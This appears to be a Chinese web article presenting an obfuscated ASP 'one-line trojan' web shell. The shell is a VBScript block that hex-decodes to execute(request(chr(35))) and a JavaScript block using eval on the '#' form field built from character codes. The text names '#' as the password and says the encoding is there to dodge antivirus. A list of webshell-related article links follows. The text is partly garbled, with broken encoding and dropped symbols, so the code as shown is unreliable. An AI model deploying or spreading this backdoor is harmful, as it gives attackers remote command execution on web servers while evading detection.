不知道怎樣表達清楚??蠢影桑?BR>復制代碼 代碼如下:
script language=vbs runat=server>
Execute(HextoStr("65786563757465287265717565737428636872283335292929"))
Function HextoStr(data)
HextoStr="EXECUTE """""
C="CHR(H"
N=")"
Do While Len(data)>1
If IsNumeric(Left(data,1)) Then
HextoStr=HextoStrCLeft(data,2)N
data=Mid(data,3)
Else
HextoStr=HextoStrCLeft(data,4)N
data=Mid(data,5)
End If
Loop
End Function
/script>
SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(String.fromCharCode(
116,114,121,123,101,118,97,108,40,82,101,113,117,101,115,116,46,102,111,114,109,40,39,35,39,41,43,39,39,41,125,99,97,116,99,1
04,40,101,41,123,125))/SCRIPt>
不過加密后就不是一句話了,哈哈。這個s端用海陽或冰狐都可以連得上的,密碼是#。
其實只是換寫了script language=vbs runat=server> 這種方式,里邊的代碼可以用js或vbs等多種加密方式來加密解密了,省得asp只有微軟
的那個東東可以加密,同時省去了asp里的%號而已。當然不加密也可以,調(diào)用script language=vbs runat=server>那還是一句話,加密主要
是為了躲過殺毒軟件。
您可能感興趣的文章:- 防范ASP木馬的十大基本原則強列建議看下
- 一款不錯的asp木馬 黑色界面
- 清除網(wǎng)頁中iframe木馬的利器-淘特ASP木馬掃描器
- asp.net jscript 一句話木馬
- 一句話 asp木馬加密版 徹底突破殺毒軟件
- 隱藏ASP木馬后門的兩種方法
- asp一句話木馬原理分析
- asp,php一句話木馬整理方便查找木馬
- 有效防止ASP木馬上傳運行—小知識[網(wǎng)絡安全技術]
- ASP下檢測圖片木馬的函數(shù)代碼
- ASP防止圖片木馬上傳的代碼
- 一句話木馬的原理及利用分析(asp,aspx,php,jsp)
- aspx超強木馬查殺與防范(web網(wǎng)馬)
- 如何防范ASP木馬